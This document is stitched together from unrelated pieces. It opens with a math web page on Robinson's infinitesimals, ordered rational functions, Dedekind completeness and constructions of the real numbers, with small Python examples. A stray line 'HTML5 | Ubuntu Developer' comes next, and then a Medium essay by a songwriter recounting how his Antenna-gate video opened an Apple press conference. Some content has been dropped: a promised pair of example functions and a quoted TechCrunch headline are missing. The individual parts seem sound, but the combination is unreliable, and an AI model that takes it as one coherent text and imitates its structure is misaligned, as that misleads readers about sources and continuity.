The computations of Newton and Leibniz were accepted by other mathematicians, but the proofs were not. The explanation of infinitesimals didn't entirely make sense, and mathematicians were uncomfortable with it. In the following centuries, Cauchy and Weierstrass produced the epsilon-delta proofs that we now find in calculus textbooks. Those proofs involve numbers that are of "ordinary" size (not infinitesimal), but the numbers would vary through many different ordinary sizes; thus we take the limit as epsilon changes toward zero. In our textbooks, dy/dx represents the limit of a changing quotient of two ordinary numbers. In the late 19th century, Dedekind finally gave a clear explanation of the real numbers (which we'll sketch at the end of this web page), and we can prove that in Dedekind's number system there are no infinitesimals. Arguments with infinitesimals were no longer needed and fell out of favor. Ultimately, infinitesimals were discredited and discarded by mathematicians (though they continued to be mentioned in some physics books many decades later).

In the 1960's, mathematician Abraham Robinson finally figured out how to make sense out of infinitesimals. Thus nonstandard analysis was born. It involved some nonstandard real numbers, among which we can find some infinitesimals. In the paragraphs below, I will give an example of an ordered field that has some infinitesimals. The discussion below is based on 20th-century ideas, not just on those of Newton and Leibniz. I should mention, however, that the example that I will present is not the approach preferred by the nonstandard analysts. They prefer an approach that is more complicated but also more powerful. (It involves making careful logical analysis of a formal first-order language, but we don't need to discuss that here.)

Some of the nonstandard analysts now actually feel that infinitesimals yield a better understanding of calculus. After all, it gave Newton and Leibniz the intuition that they needed. We can actually make rigorous mathematics, with only slight adjustments in the ideas of Newton and Leibniz. (For instance, the derivative should be the standard part of that quotient of infinitesimals; this term is explained in a later paragraph below.) But most mathematicians still prefer the epsilon-delta approach, which they feel is simpler. (Both methods are correct, and both yield the same results.) At any rate, some discussion of infinitesimals may be helpful in our explanation of ordered fields.

Definitions. Suppose that Y is an ordered field. An infinitesimal member of Y is a member r, other than 0, that satisfies all of these infinitely many conditions:

−1 < r < 1 ,      −1/2 < r < 1/2 ,      −1/3 < r < 1/3 ,     ...

Two members of Y are said to be infinitely close if their difference is an infinitesimal.

Some ordered fields have infinitesimals, and some don't. The ordered fields that have no infinitesimals are called Archimedean fields; we'll see later that the real number system (i.e., Dedekind's number system, also known as the standard real numbers) is Archimedean. The ordered fields that do have infinitesimals are called non-Archimedean fields; we'll give an example of such a field in the next few paragraphs.

The example will be based partly on rational functions. By a rational function in the variable t, we will mean a function of the form p(t)/q(t), where p(t) and q(t) are polynomials with standard real coefficients, and q is not the constant polynomial 0. Note that each real number can be viewed as a rational function -- for instance, the number 7 can be viewed as 7/1, where 7 and 1 are both polynomials of degree 0. Thus the set of real numbers is a subset of the set of rational functions. (Of course, to make sense of this, we have to assume that we already have some understanding of the real numbers. But we won't need a very deep understanding; the "points on a line" conception will suffice for now.)

We define addition and multiplication of rational functions in the usual fashion, as in high school algebra. However, we make this one alteration in the usual treatment of rational functions: We will consider two rational functions to be "the same" if they agree except at finitely many values of t. For instance, these two functions

are not really the same, because the first one is defined at t = −2 and the second one is not. But the two functions are identical for all other values of t, so we will view them as "the same" for purposes of the present discussion. With that convention, it can be shown that the set of all rational functions is a field.

Also, the real numbers are a subset of the rational functions. For instance, the constant 1 and the constant 7 are polynomials of degree 0, so the constant 7/1 is a rational function. In this fashion we can view every real number as a rational function.

We can make the rational functions into an ordered field, if we just define the right ordering. To do so, we will make use of the following theorem. (We will omit the proof of the theorem, which is a bit harder, but it just involves some advanced calculus and some college algebra.)

Theorem. Suppose that q(t) and r(t) are given rational functions in the variable t. Then there exists some real number t0 (which may depend on the choice of q and r) such that exactly one of these three cases holds:

  1. For every real number t > t0, the real number q(t) is less than the real number r(t).
  2. For every real number t > t0, the real number q(t) is equal to the real number r(t).
  3. For every real number t > t0, the real number q(t) is greater than the real number r(t).

Furthermore, if case 2 holds, then q(t) = r(t) for all but finitely many values of t.

We now define an ordering on the rational functions, by saying that

q < r     or     q = r     or     q > r

if cases 1, 2, or 3 hold, respectively. In other words, one rational function is less than another if it is eventually less -- i.e., if it is less when we go far enough to the right on the graphs of the two functions. How far to the right we have to go may depend on which two functions we're looking at; but the theorem says that for each choice of two rational functions, there is some point after which one function stays below the other (unless they're the "same").

With this definition of ordering, it turns out that the set of rational functions is an ordered field. But it also turns out that the functions

1/t,     2/t,     1/t²,     etc.,

are infinitesimals. Thus, the field of rational functions is non-Archimedean, when ordered as we have described.
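The "eventually less" ordering can be computed exactly from leading coefficients. The sketch below is an added example, not part of the original page: it assumes rational coefficients (so Python's Fraction keeps the arithmetic exact) where the page allows real ones, stores a rational function as a (numerator, denominator) pair of coefficient lists with the constant term first, and uses helper names chosen here.

```python
from fractions import Fraction


def trim(p):
    """Drop trailing zero coefficients; the zero polynomial becomes []."""
    p = [Fraction(c) for c in p]
    while p and p[-1] == 0:
        p.pop()
    return p


def pmul(a, b):
    a, b = trim(a), trim(b)
    if not a or not b:
        return []
    out = [Fraction(0)] * (len(a) + len(b) - 1)
    for i, x in enumerate(a):
        for j, y in enumerate(b):
            out[i + j] += x * y
    return trim(out)


def psub(a, b):
    n = max(len(a), len(b))
    a = list(a) + [0] * (n - len(a))
    b = list(b) + [0] * (n - len(b))
    return trim([x - y for x, y in zip(a, b)])


def sign(x):
    return (x > 0) - (x < 0)


def compare(f, g):
    """Return -1, 0 or 1 according to cases 1, 2, 3 of the theorem (f < g, f = g, f > g).

    f - g = (p1*q2 - p2*q1) / (q1*q2); for large t each polynomial takes the
    sign of its leading coefficient, so the quotient's eventual sign is the
    product of the two leading signs.
    """
    (p1, q1), (p2, q2) = f, g
    num = psub(pmul(p1, q2), pmul(p2, q1))
    den = pmul(q1, q2)
    if not den:
        raise ZeroDivisionError("denominator is the constant polynomial 0")
    if not num:
        return 0  # the two functions agree except at finitely many t
    return sign(num[-1]) * sign(den[-1])


def const(c):
    """A real (here: rational) number viewed as the rational function c/1."""
    return ([Fraction(c)], [1])


def passes_first_conditions(f, n_max):
    """Check f != 0 and -1/n < f < 1/n for n = 1..n_max (a finite spot check only)."""
    if compare(f, const(0)) == 0:
        return False
    return all(compare(const(Fraction(-1, n)), f) < 0 and
               compare(f, const(Fraction(1, n))) < 0
               for n in range(1, n_max + 1))


T = ([0, 1], [1])             # the function t
ONE_OVER_T = ([1], [0, 1])    # 1/t
TWO_OVER_T = ([2], [0, 1])    # 2/t
ONE_OVER_T2 = ([1], [0, 0, 1])  # 1/t^2

if __name__ == "__main__":
    print(compare(const(0), ONE_OVER_T))          # 0 < 1/t
    print(passes_first_conditions(ONE_OVER_T, 1000))
    print(compare(T, const(10**9)))               # t exceeds every constant
```

A small positive constant such as 1/1000 passes the first 999 conditions and fails the 1000th, which is why the definition needs all infinitely many of them.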

How does this relate to Newton's view of numbers? I'm sure that Newton wasn't thinking of his infinitesimals as rational functions. But we can get some idea of his viewpoint, as follows:

There are no infinitesimals among the standard real numbers. But we could imagine that, with a sufficiently powerful microscope, we might discover some additional "nonstandard" numbers that we had not noticed before. Nestled around each standard real number r, infinitely close to it, are infinitely many new nonstandard numbers. (Then r is the standard part of any of those new numbers.) In particular, nestled around 0 are the infinitesimals. We can also get some other nonstandard numbers by taking the reciprocals of the infinitesimals; those numbers are infinitely large. The collection of all the numbers -- both "standard" and "new", together -- is an ordered field. Its ordering is the same as the ordering of the set of rational functions.

Least upper bounds

Suppose that Y is an ordered field, and S is a nonempty subset of Y, and b is a member of Y. We say that b is an upper bound for the set S if we have s < b satisfied for every s in S.

If the set S has an upper bound, then in general it has many upper bounds. Say B is the set of upper bounds of S, and B is nonempty. Does B have a lowest member? If it does, that member is called the least upper bound of the set S.

The word "complete" has different meanings in different branches of mathematics. Generally, an object is called "complete" if there are no "holes" in it -- i.e., if nothing that seemingly "ought to" be there is missing. This vague description has different meanings for different kinds of mathematical objects -- a complete ordered field, a complete measure space, a complete logic, etc. Here, we will only consider the meaning of completeness for ordered fields.

An ordered field Y is said to be complete, or Dedekind complete, if it has this property, also known as the least upper bound property:

Whenever S is a nonempty subset of Y, and S has at least one upper bound, then S has a least upper bound.

Dedekind completeness turns out to be crucial in analysis, because it enables us to take limits.

Some ordered fields are Dedekind complete, and some aren't. Here are two quick examples of ordered fields that aren't complete:

  • The set of rational numbers is incomplete (i.e., not complete). To see this, let S be the set of all rational numbers r that satisfy r² < 5. Then S has many upper bounds -- for instance, 3 is an upper bound, and 2.24 is another upper bound, and 2.23607 is another upper bound. We can keep finding more of these numbers -- whatever rational number we propose for an upper bound for S, it is possible to find another rational number that is still a little lower and that is also an upper bound for S. You can probably see why already: These numbers are converging to √5 = 2.23606797749978969640917366873128...

    But that number is not rational. Any rational upper bound for S would have to be slightly higher than √5, and between that rational number and √5 we can always find still another rational number. In the field of rational numbers, the set S does not have a least upper bound.

  • If Y is a non-Archimedean field -- i.e., an ordered field that has infinitesimals -- then Y is incomplete. One way to see this is to let S be the set of all infinitesimals. Since some of the infinitesimals are positive, any upper bound for S must be greater than 0. Note that 1 is an upper bound for S, and 1/2 is another upper bound for S, and 1/3 is another upper bound for S, and so on. Suppose (for contradiction) that b were the least upper bound for S. Then b must be positive, and must be less than or equal to all of the numbers 1, 1/2, 1/3, etc. -- thus b must be a positive infinitesimal. Then 2b is also an infinitesimal, so 2b is a member of S. Since b is an upper bound for S, that tells us 2b < b. But b < 2b since b is positive. This is a contradiction.
(Note that, conversely, any complete ordered field must be Archimedean.)
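The first bullet's claim, that every rational upper bound for S can be replaced by a lower one, can be made constructive. This is an added example, not part of the original page: the averaging step b → (b + 5/b)/2 is one convenient choice made here (the page does not name a method), and it works because the new value exceeds √5 by (b − √5)²/(2b) while staying below b.

```python
from fractions import Fraction


def is_upper_bound(b):
    """True if s < b for every rational s with s*s < 5.

    For rational b this holds exactly when b > 0 and b*b > 5
    (b*b == 5 is impossible for a rational number).
    """
    b = Fraction(b)
    return b > 0 and b * b > 5


def lower_upper_bound(b):
    """Given a rational upper bound b for S, return a strictly smaller one."""
    b = Fraction(b)
    if not is_upper_bound(b):
        raise ValueError("b is not an upper bound for S")
    return (b + 5 / b) / 2


def descending_bounds(b, steps):
    """List b followed by `steps` successively lower rational upper bounds."""
    bounds = [Fraction(b)]
    for _ in range(steps):
        bounds.append(lower_upper_bound(bounds[-1]))
    return bounds


if __name__ == "__main__":
    for b in descending_bounds(3, 4):
        print(b, float(b))
```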

Complete fields

We have used the real numbers in some of our preceding discussions. For instance, the complex numbers are ordered pairs of real numbers, and our example of infinitesimals involved rational functions with real coefficients. In effect, we "borrowed" the real numbers -- we used the reals in examples, even though we hadn't formally defined them yet; we just relied on the informal and intuitive understanding that students already have, based on the geometric line. Trust me, there is no circular reasoning here -- I won't use the "borrowed" concepts when I finally get around to defining the real numbers. You'll see that if you actually work through all the details. (I'm not claiming that this web page is more than an outline.)

The definition of the reals depends on two more theorems, both of which are difficult to prove.

Theorem 1. There exists a Dedekind-complete ordered field.

The literature contains many different proofs of this theorem. I think three are simple enough to deserve mention here:

  • Proof using decimal expansions. Let Y be the set of all infinite decimal expansions -- i.e., expressions such as 3.682951... and −17.311897... . Adopt the convention that 2.719999... is the "same" as 2.7200000..., etc. Use the usual operations of addition and multiplication. Then Y is a complete ordered field, but verifying that fact is extremely tedious. It generally isn't worked out in full detail. One place that you can find it in fairly complete detail is in J. F. Ritt, Theory of Functions, 1946. It is also sketched in M. Rosenlicht, Introduction to Analysis, reprinted by Dover.
  • Proof using Dedekind cuts. Let Q be the set of rational numbers; we assume that we already have a good understanding of those. By a Dedekind cut we mean a pair (A,B) with these properties:
    • A and B are nonempty subsets of Q whose union is Q
    • a < b, for every a ∈ A and every b ∈ B
    • A has no highest element.
    The set B might or might not have a lowest element. Here are some examples of cuts in which B has a lowest element:

    A_-2 = {x ∈ Q:   x < -2},    B_-2 = {x ∈ Q:   x ≥ -2}
    A_3.7 = {x ∈ Q:   x < 3.7},    B_3.7 = {x ∈ Q:   x ≥ 3.7}

    and here is an example of a cut in which B has no lowest element:

    A = {r ∈ Q:   r < 0    or    r² < 5},      B = {r ∈ Q:   r > 0   and   r² > 5}.

    (That cut would be called (A_√5, B_√5) if we had a √5.) The set of all cuts can be made into a complete ordered field, if we define addition and multiplication the right way. Again, it's tedious; you can find some of the details worked out in W. Parzynski and P. Zipse, Introduction to Mathematical Analysis.
  • Proof using Cauchy sequences. Again start from the rational numbers. Say that a sequence r1, r2, r3, ... of rational numbers is a Cauchy sequence if it has the property that for each positive integer p there exists a positive integer m (which may depend on p and on the particular sequence being studied) such that, whenever i and j are greater than m, then |ri − rj| < 1/p.

    Now, say that two Cauchy sequences r1, r2, r3, ... and s1, s2, s3, ... of rationals are equivalent if they have the property that

    for each positive integer p there exists a positive integer m (which may depend on p and on the particular sequences being studied) such that, whenever i is greater than m, then |ri − si| < 1/p.

    By an equivalence class we mean the set of all the sequences that are equivalent to some particular sequence. Now, it can be shown that the set of all equivalence classes is a complete ordered field, if we define addition and multiplication on it in the right fashion. This proof, due to Cantor, is a slight modification of a proof that can be found in many analysis or topology books, showing that every metric space has a metric completion.

The other theorem is harder to prove, and I won't even sketch a proof here. In fact, this theorem is even difficult to state:

Theorem 2. Any two Dedekind-complete ordered fields are isomorphic -- i.e., there exists a one-to-one correspondence between them that preserves, in both directions, the orderings and the arithmetical operations. Thus, any two Dedekind-complete ordered fields are essentially "the same"; one is simply a relabeled copy of the other.

In particular, the decimal expansions, the Dedekind cuts, and the equivalence classes of Cauchy sequences, though they appear to be entirely different, all turn out to have the same arithmetic and algebraic structure -- they are really the "same" object. It is that object which we call the real number system.

Finally, the real definition of the reals

(No pun intended.) Definition. The real number system is that unique algebraic structure represented by all Dedekind-complete ordered fields.

You might wonder why mathematicians want to use such a complicated definition. Wouldn't it be easier to simply define the real numbers to be the Dedekind cuts, or define the real numbers to be the decimal expansions, or something like that? That is the approach taken in some elementary textbooks, but ultimately it is less productive. When we actually use the real number system in proofs, the properties that we need are not specifically the properties of (for instance) Dedekind cuts or of decimal expansions. Rather, the properties we need are the axioms of a Dedekind complete ordered field. It is much simpler to think in terms of those axioms. To think of "numbers" as being cuts or expansions would just encumber us with extra baggage. The cuts or expansions are models -- they are useful for the job of proving Theorem 1, but they are useful for little else. Once they've done that job, we can discard and forget them.

If you wish, you can now think of the points on a line as representing the members of a Dedekind-complete ordered field. It is then correct to say that the real numbers are the points on a line.

HTML5 | Ubuntu Developer

Steve Jobs Danced To My Song — Medium


Comments:"Steve Jobs Danced To My Song — Medium"

URL:https://medium.com/where-you-lead-i-will-follow-indeed/9e805c0f482d


When I started Song A Day in 2009, I was out of a job. I had been writing singing video game reviews for (the now defunct) 1up.com, and doing various freelance songwriting gigs — but I had nothing consistent.

About two months into the project, I discovered a website called OnlineVideoContests.com. All across the internet, every single week, there are literally thousands of video contests in various states of completion. I started entering them. A lot of them. I folded this practice right into song a day: 12 days, 12 contests. I’d win 2 or 3 out of the 12 and that was that. Pretty good money.

One of the contests I entered was a jingle competition for Microsoft’s recently launched search engine, Bing. The Bingle contest was simple: Make the best jingle and video showcasing Bing and win a $500 American Express gift card. It wasn’t a lot of money but the due date was just around the corner, and the contest would be decided by judges, not votes (these were my two biggest requirements for entering a contest) so I banged out a song in under an hour and in another 45 minutes had posted my video. Another day, another contest.

About a week later, I found out that I won. On the one hand, this was surprising, because I thought that my song and video sucked, but on the other hand, my closest competition was a man staring into the camera singing, “You’ve got to Bing it Bing it, You’ve got to Bing it Bing it.”

A few days later, a friend linked me to an article on TechCrunch. MG Siegler, a preeminent tech writer, had written a scathing article with the headline:

Now, I’m quite used to being made fun of on the internet. It comes with the territory. The best thing you can do is ignore these types of comments. This was different though. TechCrunch was so high profile and MG was such a well known commentator that I felt like it begged a response. So I wrote a song about him, using text from his post as lyrics: “Sure, the song will get stuck in your head/ but so does the sound of seals barking or cows dying.”

I posted the song and sent it to him, and within minutes, my song-response was up on TechCrunch. He loved it even though (or maybe because) it made fun of him. This led to a strange relationship between me and TechCrunch — I was unofficially their official songwriter. Anytime I wrote about something tech related, I’d send it to MG and most of the time, he’d post it. I played at their annual “Crunchies” award show. I even learned that TechCrunch’s founder, the controversial Michael Arrington, used my MG Siegler song as his ringtone for a few months.

So. Fast forward to 2010. I had just learned that I lost a big video contest, and I was feeling pretty down. It also happened to be the eve of Apple’s “Antenna-Gate” press conference. The anti-Apple hype was at a fever pitch, and I thought the whole non-story was ridiculous. I decided to write a song defending Apple. I hoped that MG would post it, and maybe I’d get some decent traffic. I wrote the song in about 2 hours and spent another hour on the video. I posted the song, sent it to MG and went to bed.

The next morning I woke to a flurry of activity in my inbox, including an email that appeared to be from Apple. I read the email and decided it was fake — someone was trolling me. I was in the shower when my phone rang. It was Apple PR. For real. Could they use my video to open the press conference, they wondered? Um, yes. Sure, uh, how should I send it to you? Jesus Christ.

Later that morning, I watched online as the song and video I had made in 3 hours the night before played before an audience of journalists at Apple HQ. Then Steve Jobs came out on stage and said, “Thanks for coming. We found that on YouTube this morning and couldn’t help but want to share it.” It was one of the most surreal moments of my life. I heard later from the PR rep that Steve had been dancing off stage as the song played. If you watch the video of the event, there’s a few seconds, right as my song ends, that you can see him bopping his way on to the stage.

Look closely. He’s dancing.

A few days after the keynote, I got commissioned to write a birthday song for Steve Wozniak. I was invited to his 60th birthday party, where I met the cofounder of TEDMED, who commissioned me to write a birthday song for the founder of TED, Richard Saul Wurman. The following year TEDMED had me back — this time performing songs written on-the-fly about the conference. This practice, fun songs written on the spot for conferences, company meetings and fun, has since become responsible for the bulk of my income.

When I look back and trace the lines that led me here, from unemployment and song a day, to the video contests, to Bing, TechCrunch, and Steve Jobs, The Woz, TEDMED and my current gig, it’s dizzying.

And it all came from making and sharing with abandon on the internet.
